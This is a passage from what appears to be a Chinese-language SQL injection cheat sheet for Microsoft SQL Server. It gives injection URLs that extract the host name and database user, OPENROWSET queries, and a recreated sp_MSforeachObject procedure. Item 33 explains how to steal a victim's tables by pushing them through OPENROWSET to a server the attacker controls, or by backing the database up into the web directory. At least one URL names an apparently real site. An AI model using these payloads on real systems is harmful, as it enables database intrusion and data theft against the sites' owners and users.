26、使用openrowset()连回本地做测试: SELECT a.* FROM OPENROWSET(''''SQLOLEDB'''',''''127.0.0.1'''';''''sa'''';''''111111'''', ''''SELECT * FROM [dvbbs].[dbo].[dv_admin]'''') AS a
SELECT * FROM OPENROWSET(''''SQLOLEDB'''',''''127.0.0.1'''';''''sa'''';''''111111'''', ''''SELECT * FROM [dvbbs].[dbo].[dv_admin]'''')
27、获得主机名: http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)-- select convert(int,@@servername) select @@servername
28、获得数据库用户名: http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)-- http://www.19cn.com/showdetail.asp?id=49 and user>0 select user
32、 USE MASTER GO CREATE proc sp_MSforeachObject @objectType int=1, @command1 nvarchar(2000), @replacechar nchar(1) = N''''?'''', @command2 nvarchar(2000) = null, @command3 nvarchar(2000) = null, @whereand nvarchar(2000) = null, @precommand nvarchar(2000) = null, @postcommand nvarchar(2000) = null as /* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its own result set */ /* @precommand and @postcommand may be used to force a single result set via a temp table. */ /* Preprocessor won''''t replace within quotes so have to use str(). */ declare @mscat nvarchar(12) select @mscat = ltrim(str(convert(int, 0x0002))) if (@precommand is not null) exec(@precommand) /* Defined @isobject for save object type */ Declare @isobject varchar(256) select @isobject= case @objectType when 1 then ''''IsUserTable'''' when 2 then ''''IsView'''' when 3 then ''''IsTrigger'''' when 4 then ''''IsProcedure'''' when 5 then ''''IsDefault'''' when 6 then ''''IsForeignKey'''' when 7 then ''''IsScalarFunction'''' when 8 then ''''IsInlineFunction'''' when 9 then ''''IsPrimaryKey'''' when 10 then ''''IsExtendedProc'''' when 11 then ''''IsReplProc'''' when 12 then ''''IsRule'''' end /* Create the select */ /* Use @isobject variable isstead of IsUserTable string */ EXEC(N''''declare hCForEach cursor global for select ''''''''['''''''' + REPLACE(user_name(uid), N'''''''']'''''''', N'''''''']]'''''''') + '''''''']'''''''' + ''''''''.'''''''' + ''''''''['''''''' + REPLACE(object_name(id), N'''''''']'''''''', N'''''''']]'''''''') + '''''''']'''''''' from dbo.sysobjects o '''' + N'''' where OBJECTPROPERTY(o.id, N''''''''''''+@isobject+'''''''''''') = 1 ''''+N'''' and o.category & '''' + @mscat + N'''' = 0 '''' + @whereand) declare @retval int select @retval = @@error if (@retval = 0) exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3 if (@retval = 0 and @postcommand is not null) exec(@postcommand) return @retval GO
33、DB_OWNER权限下的数据库备份方法 用openrowset吧。反连到自己的数据库机器,~先在本地建个跟目标机器一样结构的表~字段类型使用nvarchar.然后用海洋连接对方的SQL数据库,在查询分析那里执行 insert into OPENROWSET (''''sqloledb'''',''''server=你数据库服务器的IP;uid=user;pwd=pass;database=dbname;'''',''''select * from 你建立的表) select * from 对方的表— 要是数据量太大的话就看看他数据库里有没有自动编号的字段.select * from 表名 where id>100 这样来弄吧 要是和WEB同台的话,直接将库BAK到WEB目录下回来就OK啦。。。不过前提库不能太大,超过2G的话SQL就超时了 如果是SA权限可以利用下面的两个ASP程序来备份数据库: